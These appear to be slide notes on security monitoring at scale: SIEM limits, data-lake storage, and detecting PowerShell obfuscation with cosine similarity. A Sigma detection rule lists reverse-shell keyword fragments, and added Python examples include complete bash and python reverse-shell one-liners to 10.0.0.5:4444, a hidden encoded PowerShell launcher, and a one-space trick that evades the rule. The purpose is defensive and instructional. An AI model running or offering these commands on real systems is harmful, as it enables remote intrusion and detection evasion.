5. Challenges from a security point of view
• Financial regulations
• Country regulations
• Public cloud
• Distributed environment
• "Follow the sun" way of working
10. Rule-based system - example (a Sigma detection rule)
title: Suspicious Reverse Shell Command Line
status: experimental
description: Detects suspicious shell commands or program code that may be executed or used in a command line to establish a reverse shell
logsource:
    product: linux
detection:
    keywords:
        - 'BEGIN {s = "/inet/tcp/0/'
        - 'bash -i >& /dev/tcp/'
        - 'bash -i >& /dev/udp/'
        - 'sh -i >& /dev/udp/'
        - 'sh -i >& /dev/tcp/'
        - '&& while read line 0<&5; do'
        - '/bin/bash -c exec 5<>/dev/tcp/'
        - '/bin/bash -c exec 5<>/dev/udp/'
        - 'nc -e /bin/sh '
        - '/bin/sh | nc'
        - 'rm -f backpipe; mknod /tmp/backpipe p && nc '
        - ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))'
        - ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'
        - '/bin/sh -i <&3 >&3 2>&3'
        - 'uname -a; w; id; /bin/bash -i'
        - '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};'
        - ";os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');"
        - '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
        - ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print'
        - "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:"
        - 'rm -f /tmp/p; mknod /tmp/p p &&'
        - ' | /bin/bash | telnet '
        - ',echo=0,raw tcp-listen:'
        - 'nc -lvvp '
        - 'xterm -display 1'
    condition: keywords
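What the rule above actually evaluates, as an added example (not code from the original slides and not the Sigma project's own tooling): a `keywords` list with `condition: keywords` fires when any keyword occurs as a substring of the event, and Sigma string matching is case-insensitive. The keyword list is taken from the rule above; the command lines are constructed, including one benign line and one trivially evaded line, to show both the reach and the brittleness of pure substring rules.

```python
"""Keyword matching the way a Sigma `condition: keywords` rule is evaluated.

Added example for this page, not the slides' or SigmaHQ's own code.
All command lines below are constructed for illustration.
"""

# Keyword list taken from the "Suspicious Reverse Shell Command Line" rule.
REVERSE_SHELL_KEYWORDS = [
    'BEGIN {s = "/inet/tcp/0/',
    'bash -i >& /dev/tcp/',
    'bash -i >& /dev/udp/',
    'sh -i >& /dev/udp/',
    'sh -i >& /dev/tcp/',
    '&& while read line 0<&5; do',
    '/bin/bash -c exec 5<>/dev/tcp/',
    '/bin/bash -c exec 5<>/dev/udp/',
    'nc -e /bin/sh ',
    '/bin/sh | nc',
    'rm -f backpipe; mknod /tmp/backpipe p && nc ',
    ';socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))',
    ';STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;',
    '/bin/sh -i <&3 >&3 2>&3',
    'uname -a; w; id; /bin/bash -i',
    '$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()};',
    ";os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);os.putenv('HISTFILE','/dev/null');",
    '.to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)',
    ';while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print',
    "socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:",
    'rm -f /tmp/p; mknod /tmp/p p &&',
    ' | /bin/bash | telnet ',
    ',echo=0,raw tcp-listen:',
    'nc -lvvp ',
    'xterm -display 1',
]


def matched_keywords(event: str) -> list[str]:
    """Return every rule keyword contained in the event.

    Sigma string matching is case-insensitive, so both sides are lower-cased.
    """
    haystack = event.lower()
    return [kw for kw in REVERSE_SHELL_KEYWORDS if kw.lower() in haystack]


def is_suspicious(event: str) -> bool:
    """`condition: keywords` means: any keyword matched."""
    return bool(matched_keywords(event))


# Constructed command lines, as an auditd/EDR pipeline would forward them.
HIT_BASH = "bash -c 'bash -i >& /dev/tcp/10.0.0.5/4444 0>&1'"
HIT_PYTHON = ("python3 -c \"import socket,subprocess,os;"
              "s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
              "s.connect(('10.0.0.5',4444));"
              "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);"
              "os.putenv('HISTFILE','/dev/null');subprocess.call(['/bin/sh','-i'])\"")
HIT_UPPER = "NC -LVVP 9001"                   # different case, still a match
MISS_BENIGN = "ls -la /dev/tcp"               # mentions /dev/tcp, no keyword
MISS_EVASION = HIT_PYTHON.replace(",", ", ")  # one added space defeats the substring

if __name__ == "__main__":
    for name in ("HIT_BASH", "HIT_PYTHON", "HIT_UPPER", "MISS_BENIGN", "MISS_EVASION"):
        event = globals()[name]
        print(f"{name:13} suspicious={is_suspicious(event)!s:5} {matched_keywords(event)}")
```

The last two lines are the point: the rule never fires on the benign line, but a single whitespace change to the Python one-liner also takes it out of scope, which is the "mostly rule based" limitation the SIEM slides below talk about.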
11. Numbers – example region
• 55 000 data sources all over the world
• 150 000 events per second
• 700 B per event × 150 000 EPS ≈ 105 MB/s ≈ 8.25 TiB per day (about 9.07 TB in decimal units)
Data sources (count by type):
• Applications: 400
• OS: 4 200
• DB: 900
• NET: 90
• MDW (middleware): 80
§ Data source availability monitoring process
§ Component standardization in place (event normalization)
§ "Monitor All" initiative based on stack configuration (all new assets are automatically added to and removed from scope)
§ Experience in building a distributed multi-tenant cloud computing and file system.
12. Cons of SIEM:
- It is mostly a rule-based system
- Correlation is possible only over a "short" time window
- Slow search
- SIEM != log collector
Pros of SIEM:
- Fast rule-based engine
- Fast correlation engine
- Real-time alerting
Why is something else needed?
14. Main problem - S3(a) or HDFS?
1. Cost
2. Elasticity
3. SLA (availability and durability)
4. Performance per dollar
5. Transactional writes and data integrity
23. PowerShell
• Task automation and configuration management framework from Microsoft
• Command-line shell
• Scripting language
• PowerShell 1.0 was released in 2006 as a separate download for Windows XP SP2, Windows Server 2003 and Windows Vista; it was not preinstalled until Windows 7 and Windows Server 2008 R2 (PowerShell 2.0)
29. Cosine similarity
• Calculates the character distribution of a command line and assigns a similarity score against a baseline
• Detects PowerShell obfuscation (obviously!)
https://en.wikipedia.org/wiki/Cosine_similarity
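The scoring idea from this slide carried through in code, as an added example (not code from the original slides): a character-frequency vector is built from a constructed corpus of ordinary PowerShell command lines, and each new command line is scored by the cosine similarity of its own character distribution against that baseline. Base64 `-EncodedCommand` payloads and `[char]`-code concatenation have a very different character mix, so they score low even when the underlying command is harmless. The baseline corpus, the test command lines and the thresholds are all assumptions made for illustration.

```python
"""Character-distribution scoring with cosine similarity.

Added example for this page, not code from the original slides.
The baseline corpus and all test command lines are constructed.
"""
import base64
import math
from collections import Counter

# Constructed baseline of benign PowerShell command lines.
BASELINE_CORPUS = [
    "Get-Process | Where-Object { $_.CPU -gt 100 } | Sort-Object CPU -Descending",
    r"Get-ChildItem -Path C:\Logs -Recurse -Filter *.log | Select-Object FullName, Length",
    "Get-EventLog -LogName Security -Newest 50 | Format-Table TimeGenerated, EventID",
    "Get-Service | Where-Object Status -eq 'Running' | Export-Csv services.csv -NoTypeInformation",
    "Get-ADUser -Filter * -Properties LastLogonDate | Select-Object Name, LastLogonDate",
    "Test-NetConnection -ComputerName fileserver01 -Port 445",
    "Restart-Service -Name Spooler -Force",
    "Get-Content .\\app.log | Select-String -Pattern 'timeout' | Measure-Object",
]


def char_distribution(text: str) -> dict[str, float]:
    """Relative frequency of every character in text.

    Case is kept on purpose: a long run of mixed-case Base64 is itself a signal.
    """
    counts = Counter(text)
    total = sum(counts.values())
    return {ch: n / total for ch, n in counts.items()}


def cosine_similarity(a: dict[str, float], b: dict[str, float]) -> float:
    """cos(theta) between two sparse frequency vectors; 0.0 if either is empty."""
    dot = sum(w * b.get(ch, 0.0) for ch, w in a.items())
    norm_a = math.sqrt(sum(w * w for w in a.values()))
    norm_b = math.sqrt(sum(w * w for w in b.values()))
    if norm_a == 0.0 or norm_b == 0.0:
        return 0.0
    return dot / (norm_a * norm_b)


BASELINE = char_distribution("\n".join(BASELINE_CORPUS))


def score(command_line: str) -> float:
    """1.0 = same character mix as the baseline, 0.0 = no characters in common."""
    return cosine_similarity(char_distribution(command_line), BASELINE)


def encoded_command(script: str) -> str:
    """Wrap a script the way `powershell -EncodedCommand` expects it (UTF-16LE, Base64)."""
    blob = base64.b64encode(script.encode("utf-16le")).decode("ascii")
    return "powershell -NoP -W Hidden -Enc " + blob


# Constructed test inputs. PLAIN and ENCODED run the same harmless command;
# only the encoding differs. CHARCODE spells out "IEX" and "Get-Date" as [char] codes.
PLAIN = "Get-Process | Where-Object CPU -gt 100 | Select-Object Name, CPU"
ENCODED = encoded_command(PLAIN)
BENIGN = "Get-WinEvent -LogName Application -MaxEvents 20 | Format-List TimeCreated, Message"
CHARCODE = ("&([char]73+[char]69+[char]88) "
            "([char]71+[char]101+[char]116+[char]45+[char]68+[char]97+[char]116+[char]101)")

if __name__ == "__main__":
    for name, cmd in (("PLAIN", PLAIN), ("BENIGN", BENIGN),
                      ("ENCODED", ENCODED), ("CHARCODE", CHARCODE)):
        print(f"{name:9} score={score(cmd):.3f}  {cmd[:60]}")
```

Where to put the alerting threshold is a tuning decision against your own baseline; the example only shows that the plain and encoded forms of one identical command land far apart, which is why the score catches obfuscation rather than any particular cmdlet.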
30. Summary
• In Alluxio we can check a baseline in a few seconds
• Several ways of accessing the data